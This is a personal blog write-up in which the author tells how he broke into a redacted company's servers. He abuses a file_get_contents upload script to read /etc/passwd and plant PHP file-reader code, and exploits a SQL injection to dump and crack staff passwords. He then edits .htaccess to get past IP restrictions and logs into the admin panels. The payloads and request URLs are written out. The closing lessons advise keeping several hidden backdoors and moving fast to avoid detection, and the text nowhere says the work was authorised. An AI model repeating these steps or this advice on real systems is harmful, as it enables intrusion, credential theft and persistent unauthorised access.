• Twitter
  • Facebook
  • Youtube

Friday, June 1, 2018

Getting PHP Code Execution and leverage access to panels,databases,server



Greetings everyone,

This is Shawar Khan and it's been a while since my last write-up and i wasn't able to do some write-ups due to some reasons so today i decided to do a write-up on one my recent discovery and my approach using which i was able to get read,write access on a server plus i got access to their panels and database as well.

So, lets get started.

Taking the initial steps:

Let the company be Redacted.com, the first approach was to map the target application in order to get a clear view of the target surface. Fired up some enumerators,scrappers and stuff so i can get all the public subdomains of target application but there wasn't much subdomains found and most of them were static so i moved on to Host discovery phase in which applications like Shodan & Censys plays their role.

A quick search by domain name on Censys and found the following host:

Alright, then i had a subdomain server1.redacted.com which returned the following contents when visited over http:



They were using LiteSpeed server and returned a 403 Forbidden error. Means that we were not allowed to access the main page so in these kind of cases all we need to do is the enumeration of their files and directories places to get a proper map of the application. By simply applying google dorks and search on some engines i found that this subdomain was not indexed and nothing returned any kind of contents that i can make use of.

What now? Enumerators right?

I fired up dirb, dirsearch and some other magical tools with some custom wordlists and stuff and found that the server blocked the IP after every 10 requests, i could add some delays and use some proxies to bypass this IP based protection but that won't do the trick as we had to do an intense enumeration over that target so that won't be the trick.

Going though a different path:

So as everything had failed such as tools,search engines and areas having public info the only way left was to check for their snapshots and sitemap that was cached by wayback(archive.org) web archive. This trick worked every time for my and mostly got backups and stuff on servers when there is a deadend like this one.

So, a simply request to cdx endpoint of wayback web archive with the specified domain we got the following results:



So, got something that i can make use of somehow. There were 2 files which exists, the GetAndroid.php returned nothing but a blank page but when accessed files.php it returned some PHP errors as error_reporting was turned on:
The error returned contains the server path and the username but which seems interesting was the error that was undefined index. That simply mean't it was using a specific index which was not passed which in this case was the url parameter. So i tried to pass the new parameter with some random value and the following was the response:

Now this is where the fun part starts! The server returned an error message which was having another index missing this time it was a data parameter. But the thing that caught my attention was the warning that said file_get_contents(woot): failed to open stream: No such file or directory!

Yes! My input which i gave to url parameter was directly passed to the file_get_contents function of PHP which is used to retrieve contents of a given file. Before moving further lets take a quick note of the functionality of files.php:

1. There were 2 parameters ( url , data )
2. url parameter was loading the content using file_get_contents
3. data parameter was also added to the content that was ready to made
4. The content is then uploaded to another domain in the extension that we choosed

If we input url=woot.txt , a file such was random-num_woot.txt will be created and it will have the contents of the file that was given in url parameter. So i tried making a request with the following params:

http://sub.redacted.com/files.php?url=/etc/passwd&data=

and got a file uploaded on http://sub1.redacted.com/wafiles/randomnum_etc_passwd.txt
i tried to open it and it was having the following content:


and bingo! i was able to read the password file. Now the interesting part was that it was loading local files and then it was uploading the local file on another domains so it loaded the contents of passwd file on their separate subdomain which i was able to access.

Note the random numbers after | at the end of the file, that is where the input of "data" parameter is reflected. So that means we are able to create any extension on the domain and able to inject any content. I tried creating a php file with an echo command using the following data:

http://sub.redacted.com/files.php?url=file.php&data=<?php echo 1337; ?>

and a php file was created as 32142410_file.php and upon opening it returned 1337 which means my echo command was successfully executed! Sadly i was not able to execute any kind of system command by any mean as they were disabled. So instead of making a file with content and opening it again i simply uploaded a php code with file_get_contents() and the following was the data:

 http://sub.redacted.com/files.php?url=s1.php&data=<?php $fsss=file_get_contents($_GET['file'],true);echo $fsss; ?>

This will simply return the content of filename that i will provide as value of file parameter and i got the following response from files.php:
accessing the newly uploaded file with data=/etc/passwd i got the following:

 Now we got a pretty quick way to read contents of files. I uploaded another code using which i was able to get list of files in a specific directories so i can get a better view of what exists on the server:

Next using both files i started downloading sourcecodes of different PHP files,config files,logs and stuff and kept testing if i could bypass their security and able to execute codes. But after hours spending on the site i decided to retest it on the next day.

The Next Day

So, i tried to upload the code again as the previous code got deleted and upon making a request to "files.php" i got the following response:

and sadly, the files.php was modified and their firewall was given a new signature that was blocking every malicious payload sent and i was no more able to create custom executable extensions such as php. So, a patch was deployed!

Dead end?

I thought i should give up as there was nothing i could do to read files or to gain access as this was the only known way but later i remembered that i downloaded source codes of different files. So i tried to analyze their sourcecode of phpfiles to see if i can find any vulnerabilities. There were hundreds of files and checking each one by one was not the solution so i tried to search code snippets having a specific keyword such as "mysql_query" as using that we can see if any code executing a SQL query is vulnerable to SQL Injection or not.

I used the command: grep -r 'mysql_query' ./*.php | grep '$_' 

and i found that a file sms.php on the main domain was having some protection missing on "number" parameters. 


Seems like the developer really knew to protect against these kind of attacks by using mysql_real_escape_string as we can see on line 155 but as human make mistakes, the developer forgot to filter input on line 140 and it is directly passed to the query.

In order to reach the execution flow we have to first pass a 'do' parameter having a value 'GetNumber' then we have to pass another parameter 'key' having our payload:
http://redacted.com/sms.php?do=GetNumber&key=1'

i got the error:  MySQL Error 1064: You have an error in your SQL syntax

So i fired up sqlmap to get the work done quickly but after 10 requests it got blocked so manual was the only way to exploit it. I manually exploited the vulnerability and i was able to grab passwords from their database:
i dumped credentials for 10 of their staff members:

Hashed passwords :| , They were md5 so i was able to easily crack them using hashkiller:

Boom! Plain text passwords for 7 users and one of them was administrator! 
While having  read/write access using files.php i reconfigured some .htaccess files on admin panels as they were having some HTTP based protection so i modified them and accessed admin panels. The panel next asked for credentials that i got via SQLI and i was able to login:
 
Due to my initial steps that i quickly took when had access i accessed the panel. Because first there was HTTP based protection and is was having IP based restrictions, i modified the htaccess to my ip can access the panel, next i found the password via SQLI which i found from sourcecodes that i downloaded from initial vulnerability.

What did we learned?

Suppose we got read access on a server, the first thing that we always should do is to download the sourcecodes of their internal files, we can find many juicy information from there such as credentials,panel passwords,and vulnerabilities. Next thing is that if we are uploading backdoors, make sure to backdoor something which is not commonly removed so keep multiple instances of your backdoors. By the way, the SQLI was fixed right after i accessed the panel so that was a quick move! You always have to be a quick one because everything should be done in time else your moves can be detected. So this was my discovery and approach on my recent target, kindly let me know in the comments if you love this write up and if it helped you.

Things we achieved:

PHP Code execution
Read/Write access on server
Panel Access
Database Access
and many more.

 

Want my services?

Get in touch with me